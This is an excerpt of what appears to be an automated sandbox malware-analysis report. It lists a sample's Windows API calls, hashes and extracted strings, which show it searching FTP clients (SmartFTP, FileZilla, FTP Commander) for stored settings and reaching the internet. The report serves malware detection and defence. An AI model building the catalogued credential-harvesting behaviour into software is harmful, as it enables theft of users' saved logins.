                                                                                                                                                                                                  • Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: EnvironmentExpandOpenStrings
                                                                                                                                                                                                  • String ID: SOFTWARE\smartftp\client 2.0\settings\backup$SOFTWARE\smartftp\client 2.0\settings\general\favorites$folder$personal favorites
                                                                                                                                                                                                  • API String ID: 3923277744-821743658
                                                                                                                                                                                                  • Opcode ID: e843f97767911fec9b6fd3034691d6ab50a9750596cd8693bb12be5acb83529b
                                                                                                                                                                                                  • Instruction ID: 0454e2dbaba930a1c05830d090df37f1eb9a44f33d61805f8e12f109ce5a2445
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e843f97767911fec9b6fd3034691d6ab50a9750596cd8693bb12be5acb83529b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 21213E71D00518ABDB10EB95DC41ADFB7BCEB44318F1084B7E514B2181EB389B49CFA9
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • CoInitialize.OLE32(00000000), ref: 0040A0C0
                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,0040A16F,00427ED0,00000000,00000001,?,00402806,?), ref: 0040A0CE
                                                                                                                                                                                                  • CreateWindowExW.USER32(00000000,AtlAxWin,Shell.Explorer,80000000,00000000,00000000,000004B0,00000320,00000000,00000000,00000000), ref: 0040A0F3
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CreateHandleInitializeModuleWindow
                                                                                                                                                                                                  • String ID: AtlAxWin$Shell.Explorer
                                                                                                                                                                                                  • API String ID: 950422046-1300462704
                                                                                                                                                                                                  • Opcode ID: e9b6661190c81bdf072f7cb3f1dc159ab5559684b807faa4a04e62d0e94038f2
                                                                                                                                                                                                  • Instruction ID: 8885d0d040d3ab3e1edd42f45155a7fe84e7bff231f75e8e802cb7627400a982
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e9b6661190c81bdf072f7cb3f1dc159ab5559684b807faa4a04e62d0e94038f2
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 78118F30200200FFD320ABA6CC4CE6B7BBCEFCA711B240579F515EB291D7789801CA65
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040286E), ref: 004072F9
                                                                                                                                                                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00407337
                                                                                                                                                                                                  • SystemTimeToFileTime.KERNEL32(000007B2,?), ref: 00407341
                                                                                                                                                                                                  • __aulldiv.LIBCMT ref: 00407359
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Time$System$File$__aulldiv
                                                                                                                                                                                                  • String ID: n(@
                                                                                                                                                                                                  • API String ID: 3735792614-2525614082
                                                                                                                                                                                                  • Opcode ID: fb9972a15ff1dd7e61217f7ff9a5823acba4978d5a12943579487cf22718de7c
                                                                                                                                                                                                  • Instruction ID: 0875687ad9f8fbdff1f190dbab39d4211c2ed1a8acd2afdabfbd9ccbaffc37b8
                                                                                                                                                                                                  • Opcode Fuzzy Hash: fb9972a15ff1dd7e61217f7ff9a5823acba4978d5a12943579487cf22718de7c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 83011A66D2022DAACF00DBE5DD44CEFB7BCFF44344B04051AE901B3210E7B5A648CBA9
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040AB93
                                                                                                                                                                                                  • CharLowerW.USER32(?), ref: 0040ABA0
                                                                                                                                                                                                  • GetCommandLineW.KERNEL32 ref: 0040ABC0
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CharCommandFileLineLowerModuleName
                                                                                                                                                                                                  • String ID: /updatefile3$netprotdrvss.exe
                                                                                                                                                                                                  • API String ID: 3118597399-3449771660
                                                                                                                                                                                                  • Opcode ID: a9092c2346d55b23f20d8634028d89874de2ded0d1b8197c9b1551ea588aa001
                                                                                                                                                                                                  • Instruction ID: 1eba2a713c21f7c79877a49aa3ec6850c44e44909145826ab611dd80b60fa5a6
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a9092c2346d55b23f20d8634028d89874de2ded0d1b8197c9b1551ea588aa001
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 41E09B3655021A5AD750FBB1DD07BA633ACFB01705F1049B6A246F10C0EE74D55D4F9D
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetTickCount.KERNEL32 ref: 00409FCE
                                                                                                                                                                                                  • GetTickCount.KERNEL32 ref: 00409FDE
                                                                                                                                                                                                  • Sleep.KERNEL32(00000064,?,?,0040A442,?,?), ref: 00409FEC
                                                                                                                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409FFB
                                                                                                                                                                                                  • DispatchMessageW.USER32(?), ref: 0040A009
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CountMessageTick$DispatchPeekSleep
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 4159783438-0
                                                                                                                                                                                                  • Opcode ID: 45312298ad5970842c5ee584b14830e042aefe59ca6bdbaf3830585a06b866aa
                                                                                                                                                                                                  • Instruction ID: c0dc46c0c87f7bc49602bd7d2efae9f565a6f52602c3eafe7569a8fa2f6b8eea
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 45312298ad5970842c5ee584b14830e042aefe59ca6bdbaf3830585a06b866aa
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3F118671D103199ECB10AFF5CC8899F7BB9BB45314B144A7AE161F71E0C778CA118B1A
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetTickCount.KERNEL32 ref: 00409F5B
                                                                                                                                                                                                  • GetTickCount.KERNEL32 ref: 00409F5F
                                                                                                                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409F72
                                                                                                                                                                                                  • DispatchMessageW.USER32(?), ref: 00409F80
                                                                                                                                                                                                  • Sleep.KERNEL32(0000012C,?,?,?,?,00000000), ref: 00409F8D
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CountMessageTick$DispatchPeekSleep
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 4159783438-0
                                                                                                                                                                                                  • Opcode ID: 57f1528c1cf960ce56ea9ee11f0e0f6d2bf2bfe74b8bc540e63205e3b9b5f8f9
                                                                                                                                                                                                  • Instruction ID: 2f378a1af0056e794f94b22e0cd08b0b0b180d2e60cd5d2ebdc62f673b65dbb1
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 57f1528c1cf960ce56ea9ee11f0e0f6d2bf2bfe74b8bc540e63205e3b9b5f8f9
                                                                                                                                                                                                  • Instruction Fuzzy Hash: D1F0C872D042149BD714B7F2DD09B7D76A89B45714F104A36F551F70D1CA7CCD148A58
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 0040A469: InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040A535
                                                                                                                                                                                                    • Part of subcall function 0040A469: InternetSetOptionW.WININET(00000000,00000041,00000000,00000004), ref: 0040A551
                                                                                                                                                                                                    • Part of subcall function 00409F2B: GetTickCount.KERNEL32 ref: 00409F5B
                                                                                                                                                                                                    • Part of subcall function 00409F2B: GetTickCount.KERNEL32 ref: 00409F5F
                                                                                                                                                                                                    • Part of subcall function 00409F2B: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409F72
                                                                                                                                                                                                    • Part of subcall function 00409F2B: DispatchMessageW.USER32(?), ref: 00409F80
                                                                                                                                                                                                    • Part of subcall function 00409F2B: Sleep.KERNEL32(0000012C,?,?,?,?,00000000), ref: 00409F8D
                                                                                                                                                                                                  • CharLowerW.USER32(?,?,?,00423DD4,?,00000001), ref: 00408751
                                                                                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 0040875A
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CountInternetMessageTick$CharDispatchFreeLowerOpenOptionPeekSleepString
                                                                                                                                                                                                  • String ID: http://$+@
                                                                                                                                                                                                  • API String ID: 147727044-3628382792
                                                                                                                                                                                                  • Opcode ID: a6511d5d8b0c810daf140c5c911559c37a96c1275369982660b5569d586a1c5f
                                                                                                                                                                                                  • Instruction ID: 305e6509dfdc939f3ffb47eba37a7af79922f54013ecb7534e3961c93d2e4cc1
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a6511d5d8b0c810daf140c5c911559c37a96c1275369982660b5569d586a1c5f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4E41D5729002199BCF15AF66CD056EFBBB4FF44314F20447FE981B3292DB3889528B99
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • SetFilePointer.KERNEL32(00414F68,00000000,00000000,00000000,UniqueNum,00000001), ref: 00407E09
                                                                                                                                                                                                  • WriteFile.KERNEL32(00000078,00000064,00000001,00000000), ref: 00407E20
                                                                                                                                                                                                    • Part of subcall function 00407CD7: GetModuleFileNameW.KERNEL32(00000000,?,00001000,00000000,00000000,?,00407E44,00000001,UniqueNum), ref: 00407CF6
                                                                                                                                                                                                    • Part of subcall function 00407CD7: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000002,00000000,?,00407E44,00000001,UniqueNum), ref: 00407D48
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: File$CreateModuleNamePointerWrite
                                                                                                                                                                                                  • String ID: UniqueNum$x
                                                                                                                                                                                                  • API String ID: 594998759-2399716736
                                                                                                                                                                                                  • Opcode ID: 0d1cac2645660f3edc8ae4858b9aa10093ebf6a3be27c46c4cc389029dd9494e
                                                                                                                                                                                                  • Instruction ID: 8c5cde1ed6458afa5e70834db293a7f07ca8c6efd1b8e13f0da2095665a79c5a
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0d1cac2645660f3edc8ae4858b9aa10093ebf6a3be27c46c4cc389029dd9494e
                                                                                                                                                                                                  • Instruction Fuzzy Hash: F72129329002186BDF04AB74ED49DDF3B69EF44315F104636FA02E71E1E634D951C799
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?,?,00000000,00000008), ref: 0040413A
                                                                                                                                                                                                    • Part of subcall function 00408248: FindFirstFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00408280
                                                                                                                                                                                                    • Part of subcall function 00408248: WaitForSingleObject.KERNEL32(?,00000000), ref: 004082A6
                                                                                                                                                                                                    • Part of subcall function 00408248: PathMatchSpecW.SHLWAPI(0000002E,00000000), ref: 00408310
                                                                                                                                                                                                    • Part of subcall function 00408248: Sleep.KERNEL32(00000000), ref: 00408377
                                                                                                                                                                                                    • Part of subcall function 00408248: FindNextFileW.KERNEL32(00000000,00000010), ref: 004083A8
                                                                                                                                                                                                    • Part of subcall function 00408248: FindClose.KERNEL32(00000000), ref: 004083B9
                                                                                                                                                                                                    • Part of subcall function 0040BE3A: HeapFree.KERNEL32(00000000,00000000,0040384E), ref: 0040BE4D
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Find$FilePath$CloseFirstFolderFreeHeapMatchNextObjectSingleSleepSpecWait
                                                                                                                                                                                                  • String ID: #$&$*filezilla*
                                                                                                                                                                                                  • API String ID: 3438805939-758400021
                                                                                                                                                                                                  • Opcode ID: 7f420262a527ace9c0fec2a61cbcbac63df6dda7f3825d1df3812bb47b8bab04
                                                                                                                                                                                                  • Instruction ID: af0dd5899ef73ee7264a7e51d90439c8fcf38b6470501fb51340e8e2557856c3
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7f420262a527ace9c0fec2a61cbcbac63df6dda7f3825d1df3812bb47b8bab04
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8E1151B2901128BADB10EA92DC49EDF7BBCEF85304F00407AF605B6080E7385785CBE9
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?,?,00000000,00000008), ref: 00404AE5
                                                                                                                                                                                                    • Part of subcall function 00408248: FindFirstFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00408280
                                                                                                                                                                                                    • Part of subcall function 00408248: WaitForSingleObject.KERNEL32(?,00000000), ref: 004082A6
                                                                                                                                                                                                    • Part of subcall function 00408248: PathMatchSpecW.SHLWAPI(0000002E,00000000), ref: 00408310
                                                                                                                                                                                                    • Part of subcall function 00408248: Sleep.KERNEL32(00000000), ref: 00408377
                                                                                                                                                                                                    • Part of subcall function 00408248: FindNextFileW.KERNEL32(00000000,00000010), ref: 004083A8
                                                                                                                                                                                                    • Part of subcall function 00408248: FindClose.KERNEL32(00000000), ref: 004083B9
                                                                                                                                                                                                    • Part of subcall function 0040BE3A: HeapFree.KERNEL32(00000000,00000000,0040384E), ref: 0040BE4D
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Find$FilePath$CloseFirstFolderFreeHeapMatchNextObjectSingleSleepSpecWait
                                                                                                                                                                                                  • String ID: #$&$ftp*commander*
                                                                                                                                                                                                  • API String ID: 3438805939-1149875651
                                                                                                                                                                                                  • Opcode ID: 371d79112eeabe7a5308543586f4c365cccc6d4de9a1601f9ce447be0e8ea6cb
                                                                                                                                                                                                  • Instruction ID: 4761086559ade70d73b1403ca51e5d3bc462c500c99379e4fd01d7d946a964d6
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 371d79112eeabe7a5308543586f4c365cccc6d4de9a1601f9ce447be0e8ea6cb
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B61121B2901118BADB10AA92DC49EDF7F7CEF85704F00407AF609B6180E7799785CBA9
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 004094A9
                                                                                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 004094AE
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: FreeString
                                                                                                                                                                                                  • String ID: _blank$an.yandex.ru/count
                                                                                                                                                                                                  • API String ID: 3341692771-25359924
                                                                                                                                                                                                  • Opcode ID: 4ab6eb577aae85ed23f24708000ea2df93b57f18851f250654f87edd31753785
                                                                                                                                                                                                  • Instruction ID: 1eacecae91598e8b756cf85833a4a3bbf756f1dfdfc5fa02fd6c22f827bf3b29
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4ab6eb577aae85ed23f24708000ea2df93b57f18851f250654f87edd31753785
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 28015A35204114BBDB109FA6CD05D9B77A8EF85324724443BBC15E7291E779EE02CA69
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00001000,00000000,00000000,?,00407E44,00000001,UniqueNum), ref: 00407CF6
                                                                                                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00001000,?,?,00407E44,00000001,UniqueNum), ref: 00407D15
                                                                                                                                                                                                  • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000002,00000000,?,00407E44,00000001,UniqueNum), ref: 00407D48
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: File$CreateCurrentDirectoryModuleName
                                                                                                                                                                                                  • String ID: \merocz.xc6
                                                                                                                                                                                                  • API String ID: 3818821825-505599559
                                                                                                                                                                                                  • Opcode ID: 2f84b54d5be0d3dae659ee3f303fbd3ad06020502789306fc31ef9c8cba0b7e5
                                                                                                                                                                                                  • Instruction ID: bb9f2ddab4bab237696810683399403c99d26191ea9c434de7a02090ea9b9a12
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2f84b54d5be0d3dae659ee3f303fbd3ad06020502789306fc31ef9c8cba0b7e5
                                                                                                                                                                                                  • Instruction Fuzzy Hash: DA01A231904224ABE7309B569C49FEB77ADEF85710F00447FB505F20D1D6749A80CAAA
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Internet Explorer,00000000,00000001,00000000,?,?,00402C77), ref: 00406C91
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Open
                                                                                                                                                                                                  • String ID: Build$SOFTWARE\Microsoft\Internet Explorer$w,@
                                                                                                                                                                                                  • API String ID: 71445658-3061378640
                                                                                                                                                                                                  • Opcode ID: 340e09b6331f5021cec00f630817528513552a638f53ca028bdc246a1c5cc706
                                                                                                                                                                                                  • Instruction ID: 930cfdd3d9e2cf302383723a85cc45ac24d6ba1b6d45bcf7a76994dd36721e6e
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 340e09b6331f5021cec00f630817528513552a638f53ca028bdc246a1c5cc706
                                                                                                                                                                                                  • Instruction Fuzzy Hash: FBE08672664218FAEF009B929C07FDA77ACDB00758F20086AF502F10C1DAB5F714D6AC
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,00000104,00000000,?,?,?,00403796,?,?,00000104,?,00000000), ref: 004084A5
                                                                                                                                                                                                    • Part of subcall function 0040845D: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000008,00000000,?,?,004084C5,?,?,?,00000008,?,00403796,?), ref: 00408475
                                                                                                                                                                                                    • Part of subcall function 0040845D: RegCloseKey.ADVAPI32(?,?,004084C5,?,?,?,00000008,?,00403796,?,?,00000104,?,00000000,00000008), ref: 00408484
                                                                                                                                                                                                  • ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000008,?,00403796,?,?,00000104,?,00000000,00000008), ref: 00408524
                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000,?,00403796,?,?,00000104,?,00000000,00000008), ref: 00408534
                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,?,00403796,?,?,00000104,?,00000000,00000008), ref: 0040853B
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1761714292.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761697518.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761734884.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1761763408.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_bd0wJGTae5.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Heap$CloseEnvironmentExpandFreeOpenProcessQueryStringsValue
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3604167287-0
                                                                                                                                                                                                  • Opcode ID: debf70bf2fb47a5e7b7c0995a40a49e648bf285b45755a0d6fc166e7e3eeac12
                                                                                                                                                                                                  • Instruction ID: 704a8cbe2313c99ccb7bf4cac6d27c9c5720caa44ca6f9902b9fd9ccb38d811f
                                                                                                                                                                                                  • Opcode Fuzzy Hash: debf70bf2fb47a5e7b7c0995a40a49e648bf285b45755a0d6fc166e7e3eeac12
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0521C871900626BBDF205B748E45ABF3668EF05328F10063EF561F22D0EB758D508658
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • CharLowerW.USER32(00408E44,00000000,00000000,?,00408E44,00408795), ref: 004095A4
                                                                                                                                                                                                  • CharLowerW.USER32(00408795), ref: 004095D8
                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00408795), ref: 00409608
                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00408E44), ref: 0040960D
                                                                                                                                                                                                  Memory Dump Source
